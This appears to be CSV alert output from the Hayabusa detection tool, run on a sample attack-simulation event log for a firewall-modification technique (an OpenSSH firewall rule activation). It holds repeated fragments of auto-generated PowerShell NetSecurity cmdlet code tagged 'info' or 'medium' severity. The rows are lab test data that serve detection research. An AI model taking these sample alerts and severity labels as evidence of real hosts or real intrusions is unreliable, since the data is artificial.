[object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 